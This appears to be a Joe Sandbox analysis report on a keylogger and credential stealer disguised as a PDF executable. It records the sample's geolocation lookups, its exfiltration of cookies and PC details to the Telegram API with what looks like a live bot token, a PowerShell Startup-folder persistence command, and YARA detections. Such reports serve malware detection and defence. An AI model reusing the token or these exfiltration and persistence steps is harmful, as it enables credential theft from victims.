2025-01-13 11:08:32 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 13 Jan 2025 11:08:32 GMT Content-Type: application/json Content-Length: 553 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-13 11:08:32 UTC	553	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 35 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 39 39 37 39 30 39 30 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 4f 57 45 52 32 30 32 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 65 74 73 64 65 61 6c 55 70 64 61 74 65 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 33 37 34 38 31 39 37 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 65 6e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 6c 61 6e 6b 75 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 6f 72 68 64 62 6c 61 6e 6b 75 73 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 Data Ascii: {"ok":true,"result":{"message_id":4562,"from":{"id":7199790900,"is_bot":true,"first_name":"POWER2025","username":"LetsdealUpdateBot"},"chat":{"id":7437481970,"first_name":"Ben","last_name":"Blankus","username":"Lorhdblankus","type":"private"},"date":17367

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49774	104.21.32.1	443	7556	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:32 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 11:08:33 UTC	861	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:33 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2081302 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hbg%2B6AHxcbdzh6NhfRezTNh0h%2F9fs7TZrwsMeXV9QJCiLm%2BdiRhLxACWQC6wEtqyAtUHwhHU9hj%2Fdw2fzDoHCncOJwCXafeVR%2B%2BbirHGts2GGYLPHaTT5Ox1WtIMz2cb8zSSSHQA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014edd2ad3ec327-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1591&rtt_var=653&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1607929&cwnd=189&unsent_bytes=0&cid=d41ffeaa5c99cada&ts=153&x=0"
2025-01-13 11:08:33 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49776	104.21.32.1	443	7556	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:34 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-13 11:08:34 UTC	853	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2081303 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eAwvTk3HUc%2B3eGSObsi2dzk9h6LXOyOzGNepa6gcCzyPUMDJ8dkZFOjyrdXyzKJa4y5CmcU77NYXycqMTk9luIC1X88FKRdSg%2FtwUoDkGQR5HXnT60IYUjfN5yM81exezbpLwLSK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014eddc0c8341a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1553&min_rtt=1552&rtt_var=585&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1865814&cwnd=241&unsent_bytes=0&cid=f1623630ed2d645f&ts=143&x=0"
2025-01-13 11:08:34 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49777	149.154.167.220	443	7556	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:35 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:49:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-13 11:08:35 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 13 Jan 2025 11:08:35 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-13 11:08:35 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49778	149.154.167.220	443	7556	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:43 UTC	350	OUT	POST /bot7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U/sendDocument?chat_id=7437481970&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd34928e143909 Host: api.telegram.org Content-Length: 7046
2025-01-13 11:08:43 UTC	7046	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 34 39 32 38 65 31 34 33 39 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 30 37 38 31 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f Data Ascii: --------------------------8dd34928e143909Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies \| user \| VIP Recovery PC Name:960781Date and Time: 13/01/2025 /
2025-01-13 11:08:43 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 13 Jan 2025 11:08:43 GMT Content-Type: application/json Content-Length: 553 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-13 11:08:43 UTC	553	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 35 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 39 39 37 39 30 39 30 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 4f 57 45 52 32 30 32 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 65 74 73 64 65 61 6c 55 70 64 61 74 65 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 33 37 34 38 31 39 37 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 65 6e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 6c 61 6e 6b 75 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 6f 72 68 64 62 6c 61 6e 6b 75 73 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 Data Ascii: {"ok":true,"result":{"message_id":4563,"from":{"id":7199790900,"is_bot":true,"first_name":"POWER2025","username":"LetsdealUpdateBot"},"chat":{"id":7437481970,"first_name":"Ben","last_name":"Blankus","username":"Lorhdblankus","type":"private"},"date":17367

Target ID:	0
Start time:	06:08:02
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PDF-3093900299039 pdf.exe"
Imagebase:	0x460000
File size:	1'043'968 bytes
MD5 hash:	1F74495F02AD58FF437B07CF58A3E0AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000000.00000002.4158597133.00000000051C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	06:08:03
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe'
Imagebase:	0x9a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:08:03
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:08:05
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PDF-3093900299039 pdf.exe"
Imagebase:	0xfc0000
File size:	1'043'968 bytes
MD5 hash:	1F74495F02AD58FF437B07CF58A3E0AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	06:08:05
Start date:	13/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:08:16
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe"
Imagebase:	0xc90000
File size:	1'043'968 bytes
MD5 hash:	1F74495F02AD58FF437B07CF58A3E0AD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 61%, ReversingLabs Detection: 64%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	06:08:17
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe'
Imagebase:	0x9a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:08:17
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:08:18
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe"
Imagebase:	0xd70000
File size:	1'043'968 bytes
MD5 hash:	1F74495F02AD58FF437B07CF58A3E0AD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	349
Total number of Limit Nodes:	22

Executed Functions

Function 04DDC0C0 Relevance: 10.6, Strings: 6, Instructions: 3125COMMON

Download Yara Rule

Strings

4'^q, xrefs: 04DDD0AB
(o^q, xrefs: 04DDC196
4'^q, xrefs: 04DDDF91
4|cq, xrefs: 04DDED08
4'^q, xrefs: 04DDCF23
4|cq, xrefs: 04DDED23

Memory Dump Source

Source File: 00000000.00000002.4156877688.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4dd0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: (o^q$4'^q$4'^q$4'^q$4|cq$4|cq
API String ID: 0-2087561084
Opcode ID: e3aadd0c0e83c70491a3da23cb6a496e78b7d87b6f2175638b3b24fd6dc88f7a
Instruction ID: 9701282ceec548ecce0602070ab51522ff9b634b9f08576ba2302f7914c4494b
Opcode Fuzzy Hash: e3aadd0c0e83c70491a3da23cb6a496e78b7d87b6f2175638b3b24fd6dc88f7a
Instruction Fuzzy Hash: 69630874A00619CFCB24DF68C988A9DBBB2FF89300F158599E459AB361DB35ED81CF50

Function 04DDB358 Relevance: 7.0, Strings: 5, Instructions: 718COMMON

Download Yara Rule

Strings

,bq, xrefs: 04DDB96F
,bq, xrefs: 04DDB97F
Hbq, xrefs: 04DDBC58
(o^q, xrefs: 04DDBBEB
(o^q, xrefs: 04DDBBE1

Memory Dump Source

Source File: 00000000.00000002.4156877688.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4dd0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq$Hbq
API String ID: 0-3486158592
Opcode ID: 29023374743a2fa9ee7b767405fe42e508f2a9ced00ab894c37357b07cf8d74b
Instruction ID: bf1e5e8938bd53ba7a1b21618f91a30d963c994f98f6e8f32ca45ef82795529b
Opcode Fuzzy Hash: 29023374743a2fa9ee7b767405fe42e508f2a9ced00ab894c37357b07cf8d74b
Instruction Fuzzy Hash: 08526D34B005159FCB18DF69C598A6E7BB2BF84354F16816AE816EB364DB31FC41CB90

Function 06CE1C80 Relevance: 6.9, Strings: 5, Instructions: 649
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 06CE3159
Hbq, xrefs: 06CE32FD
Hbq, xrefs: 06CE3273
Hbq, xrefs: 06CE31EC
Hbq, xrefs: 06CE33BB

Memory Dump Source

Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq$Hbq$Hbq
API String ID: 0-1677660839
Opcode ID: 6f6570ae69606e7d570a0c39958e6d6040f1a394c860c7560e33fa83edfaa955
Instruction ID: 197d5a98a849541e867935fce3e21260d7f8f3de0efdb63ab1e24a1c89332eb8
Opcode Fuzzy Hash: 6f6570ae69606e7d570a0c39958e6d6040f1a394c860c7560e33fa83edfaa955
Instruction Fuzzy Hash: D3424E70E00258CFDB94DFB9C85079EBBF6AF88300F14856AD409AB395DB349A45CFA5

Function 04DDFB18 Relevance: 2.8, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 04DDFB2E
Xbq, xrefs: 04DDFB47

Memory Dump Source

Source File: 00000000.00000002.4156877688.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4dd0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: Xbq$$^q
API String ID: 0-1593437937
Opcode ID: 7a9ac11bbe241b1934c46ab1a5060b67d54380cb231aa12c780f68e3c0bd42c2
Instruction ID: 661020f11b6ba51819c5fea188c7cf06aab6855a54a95fa9d022072eb51c0534
Opcode Fuzzy Hash: 7a9ac11bbe241b1934c46ab1a5060b67d54380cb231aa12c780f68e3c0bd42c2
Instruction Fuzzy Hash: 54817074B002188BDB18AF799C5467E7BB7BFC8710B04892EE457E7398DE34D80297A1

Function 06CEE459 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d0ac3341467674c871bfeabe86dbcc3b2298393feb872d287c207c1a6c93da8
Instruction ID: b74fdf29f712f628edf749d37cc0ee965e3bba1a09412baa7a1b4297b2ebdc39
Opcode Fuzzy Hash: 1d0ac3341467674c871bfeabe86dbcc3b2298393feb872d287c207c1a6c93da8
Instruction Fuzzy Hash: 1DD13A30E00309CFDB64DFA9C948B9DBBB1BF88304F158569D409AB3A5DB74E945CB91

Function 06CE2B88 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afdeef0b502bd7f1ec16668a13cd66a5fb951556632b6418d4ca5524765b6327
Instruction ID: 6e5196bfa843bdabb6378a4fd13bef9654dc1618f83c0ca327b5fac7e2b0abce
Opcode Fuzzy Hash: afdeef0b502bd7f1ec16668a13cd66a5fb951556632b6418d4ca5524765b6327
Instruction Fuzzy Hash: 32C17C31E002588FDF55DF65C880B9DBBF2AF88310F04C5AAD459AB255DB34EA85CF90

Function 04DD65B0 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4156877688.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4dd0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71aad027690eb6c7987b3477c5c8808401016cbf777b85fc6c568edb729580aa
Instruction ID: 60e5e4686677de81b0045018be869a79f1795145a192be834ec348619dbeda15
Opcode Fuzzy Hash: 71aad027690eb6c7987b3477c5c8808401016cbf777b85fc6c568edb729580aa
Instruction Fuzzy Hash: 46A1CE74E012198FDB14DFA9D584A9DFBF2FF48310F1495AAE408AB356DB34A981CF90

Function 027CAD48 Relevance: 1.7, APIs: 1, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 027CAF9E

Memory Dump Source

Source File: 00000000.00000002.4130408711.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27c0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: deda1b07d20ffba9892e967beadd3aa1285191c7c934467a9bfc76590f589b8c
Instruction ID: bd977d3853c4cb85d2d252f6fef08de4ffef074807a068c8b48dbe9d8653ce13
Opcode Fuzzy Hash: deda1b07d20ffba9892e967beadd3aa1285191c7c934467a9bfc76590f589b8c
Instruction Fuzzy Hash: 8D8143B0A00B098FDB24DF79D54579ABBF1FF88345F108A2DD48A9BA50DB35E845CB90

Function 027C590D Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 027C59C9

Memory Dump Source

Source File: 00000000.00000002.4130408711.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27c0000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d9fb548e70b6e3f8202e47992bd7885cb94a43eb36ee66c740363f684b4bd3e7
Instruction ID: 9e540a526d1f0a58528986b2eea1ccf4a839a03bc184028bc9d33002ad0cb8f0
Opcode Fuzzy Hash: d9fb548e70b6e3f8202e47992bd7885cb94a43eb36ee66c740363f684b4bd3e7
